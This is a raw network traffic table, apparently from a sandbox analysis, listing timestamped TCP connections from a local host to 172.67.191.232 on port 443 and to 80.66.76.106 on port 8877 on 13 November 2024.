                                                                                                                                                          Nov 13, 2024 11:02:35.922229052 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:35.994199038 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:35.994237900 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:35.994400978 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:35.994661093 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:35.994676113 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:36.615406036 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:36.615478992 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:36.616800070 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:36.616806984 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:36.617305994 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:36.617310047 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:38.445245981 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:38.445300102 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:38.445451975 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:38.448071003 CET58097443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:38.448087931 CET44358097172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:38.507518053 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:38.507585049 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:38.507852077 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:38.512082100 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:38.512100935 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:39.128438950 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:39.128499031 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:39.129117012 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:39.129136086 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:39.130549908 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:39.130554914 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.086849928 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:41.092109919 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.104847908 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:41.109879971 CET88775809980.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.109952927 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:41.110488892 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:41.115259886 CET88775809980.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.675421953 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.675502062 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.675503016 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:41.675549030 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:41.675755978 CET58098443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:41.675781965 CET44358098172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.753165007 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:41.753283978 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.756114960 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:41.756369114 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:41.756406069 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.939198017 CET88775809980.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.942351103 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:41.943881989 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:41.943881989 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:41.948848009 CET88775809980.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:41.948873043 CET88775809980.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:42.362071991 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:42.362240076 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:42.365072966 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:42.365073919 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:42.365091085 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:42.365108013 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:44.403559923 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:44.403633118 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:44.404269934 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:44.404269934 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:44.488168955 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:44.488220930 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:44.490864038 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:44.490864038 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:44.490911961 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:44.756805897 CET58100443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:44.756844997 CET44358100172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:45.124250889 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:45.124335051 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:45.176753044 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:45.176810026 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:45.199784994 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:45.199841976 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.142401934 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.142462969 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.142494917 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.142514944 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.142534971 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.142558098 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.142779112 CET58101443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.142792940 CET44358101172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.220108032 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.220163107 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.220222950 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.220582962 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.220599890 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.836010933 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.841461897 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.841461897 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.841461897 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:47.841496944 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:47.841532946 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:49.820970058 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:49.821024895 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:49.821397066 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:49.822086096 CET58102443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:49.822133064 CET44358102172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:49.896879911 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:49.896967888 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:49.898801088 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:49.899369001 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:49.899382114 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.269625902 CET88775809980.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.274003029 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:50.510699987 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.512084961 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:50.512665987 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:50.512684107 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.513555050 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:50.513567924 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.623966932 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.624031067 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.624118090 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.627995014 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.628017902 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.764416933 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.764527082 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.764795065 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.767998934 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.768043041 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:53.401137114 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:53.401221037 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:53.401969910 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:53.401983976 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:53.403017044 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:53.403023958 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.224709988 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.224766016 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.224777937 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.224812031 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.225178957 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.225202084 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.749654055 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.749700069 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.749774933 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.750010967 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.750024080 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:56.354991913 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:56.355343103 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:56.357201099 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:56.357201099 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:56.357234001 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:56.357275009 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.374526978 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.374629021 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.374667883 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.378308058 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.382680893 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.382702112 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.522171974 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.522275925 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.526490927 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.526490927 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.526578903 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:59.151068926 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:59.151141882 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:59.151607037 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:59.151627064 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:59.153003931 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:59.153014898 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.524415016 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.524477959 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.524502993 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.524585962 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.524657965 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.524704933 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.611067057 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.611181974 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.611265898 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.611504078 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.611530066 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.234533072 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.236881018 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:02.236881018 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:02.236927032 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.243505001 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:02.243511915 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.290465117 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:02.297291994 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.299993992 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:04.592155933 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.592250109 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.592358112 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.592505932 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.592556953 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.592600107 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.675477982 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.675529003 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.675726891 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.676140070 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.676152945 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:05.299349070 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:05.299438953 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:05.300091982 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:05.300111055 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:05.301808119 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:05.301829100 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.619025946 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.619185925 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.619230032 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.619302034 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.619369984 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.619411945 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.701107979 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.701220989 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.701471090 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.701587915 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.701617956 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:08.307857037 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:08.311583042 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:08.312755108 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:08.312755108 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:08.312786102 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:08.312833071 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.207629919 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.207703114 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.207706928 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.207751989 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.207895994 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.207926989 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.287736893 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.287817001 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.287887096 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.288177967 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.288203955 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.897500038 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.897932053 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.898272038 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.898299932 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.904033899 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.904076099 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:14.603709936 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:14.603776932 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:14.604296923 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:14.607085943 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:14.607130051 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:14.688028097 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:14.688096046 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:14.688383102 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:14.688417912 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:14.688426018 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:15.448308945 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:15.448359013 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:15.448913097 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:15.448924065 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:15.450834036 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:15.450839043 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:17.830323935 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:17.830488920 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:17.830543041 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:17.830626011 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:17.830626011 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:17.884116888 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:17.884145975 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:17.888258934 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:17.888258934 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:17.888286114 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:18.135369062 CET58111443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:18.135401964 CET44358111172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:18.487180948 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:18.492049932 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:18.492049932 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:18.492069960 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:18.495538950 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:18.495551109 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:20.439498901 CET581138877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:20.444794893 CET88775811380.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:20.444941044 CET581138877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:20.445261955 CET581138877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:20.451217890 CET88775811380.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:20.528692961 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:20.528827906 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:20.539064884 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:20.544673920 CET58112443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:20.544707060 CET44358112172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:20.780016899 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:20.780066967 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:20.784105062 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:20.788014889 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:20.788027048 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:21.274148941 CET88775811380.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:21.274211884 CET581138877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:21.274636030 CET581138877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:21.276021004 CET581138877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:21.279638052 CET88775811380.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:21.281243086 CET88775811380.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:21.409349918 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:21.409415007 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:21.409888029 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:21.409895897 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:21.411159039 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:21.411164045 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:23.232287884 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:23.232340097 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:23.232351065 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:23.232386112 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:23.232439041 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:23.232532978 CET58114443192.168.2.8172.67.191.232
